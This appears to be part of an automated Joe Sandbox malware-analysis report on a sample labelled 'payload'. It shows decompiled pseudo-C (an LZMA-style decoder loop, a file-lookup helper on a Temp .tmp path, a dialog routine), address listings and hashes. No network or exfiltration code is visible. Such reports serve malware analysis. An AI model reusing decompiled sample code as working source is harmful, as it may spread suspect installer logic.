							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406344
0x00406344
0x00406349
0x004063c0
0x004063c7
0x004063d1
0x004069b0
0x004069b0
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x00000000
0x00406a01
0x00406a01
0x00406a05
0x00406bb4
0x00000000
0x00406bb4
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00000000
0x00406a23
0x0040634b
0x0040634b
0x0040634f
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x00406370
0x00406377
0x0040637a
0x00406385
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406394
0x004063b2
0x004063b4
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d9
0x004065dc
0x0040657f
0x00406585
0x00000000
0x00000000
0x00000000
0x004065de
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x0040657c
0x00000000
0x0040657c
0x00406396
0x00406396
0x00406399
0x0040639f
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406488
0x0040648b
0x00406402
0x00406402
0x00406408
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x00406515
0x00406518
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b8
0x004064b8
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x00406523
0x00406523
0x00406526
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406414
0x00000000
0x00000000
0x00000000
0x00406491
0x004063dd
0x004063e1
0x00406b4e
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00406be2
0x00406be6
0x00406be6
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063ff
0x00000000
0x004063ff
0x0040648b
0x00406394
0x004061c8
0x004061c8
0x004061d1
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x00000000
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x00000000
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x00000000
0x0040671c
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x00000000
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x00000000
0x004069ad
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00000000
0x00406b20
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x00000000
0x00406975
0x00406973
0x00406ba8
0x00000000
0x00000000
0x004061d7

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
Instruction ID: a8746b25a1c6b49bbeafbf020c2dfcaa04563a9eac1a8e827fb2969916571183
Opcode Fuzzy Hash: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
Instruction Fuzzy Hash: 70F17670D00229CBCF18CFA8C8946ADBBB1FF44305F25816ED856BB281D7786A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FFD(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x421558); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x421558;
			}

0x00406008
0x00406011
0x00000000
0x0040601e
0x00406014
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,00421558,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,0040589C,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,T'Wu,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,75572754,C:\Users\user\AppData\Local\Temp\), ref: 00406008
FindClose.KERNEL32(00000000), ref: 00406014

Strings

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp, xrefs: 00405FFD

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsg90FC.tmp
API String ID: 2295610775-2787541972
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 1297c1e42099762feae64532f60583430090df1d404adb2e37743a0561846f6f
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 8CD012319491206BC3105B38AD0C85B7A599F593317118A33F567F52F0C7788C7296E9

Uniqueness

Uniqueness Score: -1.00%

Function 00403A0B Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403A0B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x41fcf0 = _t35;
					if(_t115 == 0x110) {
						 *0x423708 = _t125;
						 *0x41fd04 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41ecd0 = _t91;
						E00403EDE(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x422ee8);
						 *0x422ecc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x41fcf0 = 1;
					}
					_t122 =  *0x4091dc; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423720;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F2A(0x40b);
						while(1) {
							_t37 =  *0x41fcf0;
							 *0x4091dc =  *0x4091dc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091dc; // 0x0
							__eflags = _t39 -  *0x423724;
							if(_t39 ==  *0x423724) {
								E0040140B(1);
							}
							__eflags =  *0x422ecc - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091dc -  *0x423724; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1B(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EDE(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EDE(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EDE(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42378c - _t133;
							_v32 = _t49;
							if( *0x42378c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403F00(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41ecd0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42378c - _t133;
							if( *0x42378c == _t133) {
								_push( *0x41fd04);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41ecd0);
							}
							E00403F13();
							E00405CF9(0x41fd08, 0x422f00);
